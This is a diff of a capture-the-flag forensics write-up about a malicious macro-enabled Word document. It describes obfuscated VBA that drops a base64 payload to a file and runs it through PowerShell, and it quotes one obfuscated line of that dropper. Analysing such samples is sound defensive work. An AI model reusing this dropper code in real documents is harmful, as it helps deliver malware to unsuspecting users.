pgaulon/pgaulon.github.io/2022-11-15-htb-hack-the-boo-ctf/forensics_halloween_invitation.md

 # [Forensics] Halloween invitation

 The challenge starts with a Macro Word Document `.docm`.
-The macro contains obfuscated code that writes the base64 encoded payload into a file, then read the payload from that file to execute it via powershell:
+The macro contains obfuscated code that writes a base64 encoded payload into a file, then reads the payload from that file to execute it via powershell:

 ```vba
 Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)